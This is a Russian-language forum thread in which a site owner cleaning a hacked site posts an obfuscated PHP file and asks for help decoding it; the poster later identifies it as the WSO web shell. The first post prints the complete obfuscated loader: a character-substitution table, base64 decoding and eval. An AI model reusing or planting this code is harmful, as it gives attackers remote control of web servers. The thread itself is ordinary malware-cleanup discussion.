Помогите расшифровать вредоносный код

(Ответов: 2, Просмотров: 709)
  1. WP-R.ru - магазин WP Аватар для mojwp
    • Регистрация: 13.09.2011
    • Сообщений: 841
    • Репутация: 290
    • Webmoney BL: ?
    Добрый день.
    Чищу сайт от вируса. Подозреваю, что нашел главный файл.
    Помогите расшифровать, кто сталкивался с подобным. Здесь не только base64

    Код:
    <?php
    $vKR26EV = Array('1'=>'R', '0'=>'Y', '3'=>'Z', '2'=>'A', '5'=>'E', '4'=>'T', '7'=>'D', '6'=>'B', '9'=>'o', '8'=>'j', 'A'=>'2', 'C'=>'O', 'B'=>'U', 'E'=>'n', 'D'=>'J', 'G'=>'r', 'F'=>'d', 'I'=>'P', 'H'=>'x', 'K'=>'N', 'J'=>'a', 'M'=>'y', 'L'=>'i', 'O'=>'1', 'N'=>'s', 'Q'=>'X', 'P'=>'F', 'S'=>'p', 'R'=>'z', 'U'=>'H', 'T'=>'6', 'W'=>'q', 'V'=>'k', 'Y'=>'w', 'X'=>'Q', 'Z'=>'M', 'a'=>'u', 'c'=>'5', 'b'=>'K', 'e'=>'b', 'd'=>'h', 'g'=>'L', 'f'=>'3', 'i'=>'8', 'h'=>'l', 'k'=>'4', 'j'=>'g', 'm'=>'f', 'l'=>'m', 'o'=>'V', 'n'=>'v', 'q'=>'9', 'p'=>'c', 's'=>'C', 'r'=>'S', 'u'=>'7', 't'=>'t', 'w'=>'G', 'v'=>'I', 'y'=>'W', 'x'=>'e', 'z'=>'0');
    function vBSAC62($vR34A2O, $vC9MYMI){$vXVSXMO = ''; for($i=0; $i < strlen($vR34A2O); $i++){$vXVSXMO .= isset($vC9MYMI[$vR34A2O[$i]]) ? $vC9MYMI[$vR34A2O[$i]] : $vR34A2O[$i];}
    return base64_decode($vXVSXMO);}
    $vN1J39Q = 'DwPOFwdmpwPRpM2qvsvcC7ZHZAK8Z8XAZ4Vf34jR0yZcZ4KdZ8VH385Y0RdL3rvusj9V0AqNe'.
    'fvjIr2LvA1lKrvusL1V3y3dFyHzQAP8FwhneL2qvsFwJyHhpzOdeLpusL1V3y3dFyHzQfoR'.
    '3oqdJlPkv7zjFUDO34NbDw1h3lPOeU1m0AddpEKhFs2qvsFQJycVefFR'.
    'g45MK45ECY9bXwhaJoqR3QX9DAoMplqMQAHn3MpN4hoZ4sVusV6SelhmpAozbsFNeAFm3QDMefDRDMYYb4'.
    'NbXwhaJoqR3QX9DAOdxPqhxwo8FQ1SeAcmFwht3rpNZsVusV6R3Q1mFwht3oqNJyOSFsjYb4'.
    'NbXUKhFPqt0yFS0OqHFyqz3QKmpEoaFwht3rjYb4NbXw1h3lha3rjEoOKIQO3PBhKD4zkEgs2EZLkOg85Eb4NbslhlbwFhFPqt'.
    '0yFS0OqHFyqz3QKm3f68bsVSvUNbvs2jvw3OelKzJyqavPF44fKzplhYpAH'.
    'dpAdhpMjV0QDM0QVSvUNbvs2jvs2jvs6M3Q1OplkjJQKm0QDM0QV9DwPMplPcbr2/vwPMplPcQAOdpsjEoOKIpf1MJQ'.
    '6RewPRJwoRDMYjDwPMplPcbr2TvUKzplhYpAHdpAdhpMjV0QDM0QVSCY9jvs2jmX9jvs2jDPqX4'.
    'OKBv7zjoOKIpf1MJQ6RewPRJwoRbs1mB5q4osVusL2jvs2VQzKI4ztD1r2qvPF44fKzplhYpAHdpAdh'.
    'pMjVQzKI4ztD1rVusEzbsl3OelKzJyqavUFRezHn3AhabsVjxY9jvs2jJwod3'.
    'woMbsFvoP1XgR5aZs2zZ7Xj4lqzv53nFycVDMVusL2jvs6VJyB9v8XYKsvSCYSqsjSlFyc8FwhneL6QBzqR3Q18eAqGJyB9Dw'.
    'NNvs1Abr6usL2jvs2VQzKI4ztD1oNVJOzjIr2VF8Nbvs2jvUKhFwKn'.
    'eAtS3rjVJMYjDU0SCYSqsjSS3Ljd3yOYFUV9DwPOFwdmpwPRpMVSvUNbvs2jvwhlbwhRpAozbs1mB5q4oPNEpwPRpMFFbr2lDL'.
    '29eyXObs1mB5q4oPNEpwPRpMFFbr2qIr2V0QozJPqY0QKRbrVbvs2jvs2jvs6QBzqR3Q18eAqGJyB9eyXOb'.
    's1mBzoroVoryMFvoP1XQzdIBOXEQrVNvs1dFQ19Qf6dpfZSCY9bvs2jvwhlvsjdJQKR3QX9DPq74zqgrBoeeyXObs1mBz'.
    'oroVoryMFvoP1XQzdIBOXEQrhFbr6ims29DPq74zqgrBoeeyXO'.
    'bs1mBzoroVoryMFvoP1XQzdIBOXEQrhFvs5qvs1dFQ19Qf6dpfZSbX9j'.
    'vs2jvs2jvUFRezHn3AhabsVusEzbsl3OelKzJyqavwP8FwhnehD7bsVjxY9jvs2jJy09vB2VQO6IBO1eDf2HDOzSvUNbvs2j'.
    'vs2jvs2V0r2qvwPMplPcb29jvs2jvs2jvs2jvs2LFycdeyBLv7z+vU69pPqOelPt'.
    '3rjSg29jvs2jvs2jvs2jvs2LpwdYQf3hpEKSeAkLv7z+vU69pU3hpEKSeAk9brYbvs2jvs2jvs2jvs2jvEFReOqA3'.
    'QDRJyqavL2qIL6QBzqmoVorBzhI4LYbvs2jvs2jvs2jvs2jvEKd3loteA1hvL2qIL62JycSQAFhFsjEpA'.
    'Pl3oqteA1hDMVbvs2jvs2jvs2SCY9jvs2jvs2jvwo8JwijpAoMJyPNJQShbs1db4Nbvs2jvUzj3yHR3r6usL2jvs2'.
    'jvs2j3Q3desjVQO6IBO1eDf2HDOzSCY9jvs2jmXSqslhlbs6heQ6zxrjVQO6IBO1eDA5EQrVjbX9jvs2jJy09JQKR'.
    '3QX9Dw1h3lPOeU1m0yKzJyqabr2lDL6lFyc8FwhnehqhxwhRFUZ9DAP8FwhneLpjgL2V3wol0QoNFPq'.
    'd0f1SeAkSbX9jvs2jvs2jvs1mB5q4oPNE0rFFv7zjDw1h3lPOeU1m0yKzJyqaCY9jvs2j3yHR3X9jvs2jvs2jvs1mB5q4oPNE'.
    '0rFFv7zjDOKh0zha3liECYSS3LjjvyotpU1cbs1mB5q4oPNE0rFFbr2lDL6lFyc8FwhnehqhxwhRFUZ9DAP8FwhneLpj'.
    'gL2VQO6IBO1eDA5EQrVjbX9jvs2j0APNePqOpAoMQA3OelZ9DAP8'.
    'FwhneLpjgL2VQO6IBO1eDA5EQrVuslokJQXu';
    eval(vBSAC62($vN1J39Q, $vKR26EV));?>
    • 0
  2. Опытный Аватар для genesis33
    • Регистрация: 10.09.2012
    • Сообщений: 453
    • Репутация: 72
    • Webmoney BL: ?
    • 0
  3. WP-R.ru - магазин WP Аватар для mojwp
    • Регистрация: 13.09.2011
    • Сообщений: 841
    • Репутация: 290
    • Webmoney BL: ?
    genesis33, Благодарю.
    Это первое, что я попробовал. Вы бы тоже могли попробовать.
    Обратите внимание на первые строки: дополнительно кодируется по символам.

    ---------- Сообщение добавлено 14:01 ---------- Предыдущее 13:40 ----------

    Топик можно закрыть.
    Подсказали решение.
    WSO Web Shell
    • 0

Похожие темы

Темы Раздел Ответов Последний пост
Помогите расшифровать письмо от Платона
Вопросы от новичков 30 13.04.2013 16:48
PHP - помогите расшифровать 1 строку
Web программирование 3 20.03.2013 11:40
Помогите расшифровать base64
Web программирование 7 16.07.2012 21:03
Помогите расшифровать PHP код
Web программирование 7 16.11.2011 11:03
Помогите расшифровать
Google 12 15.11.2011 22:58

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры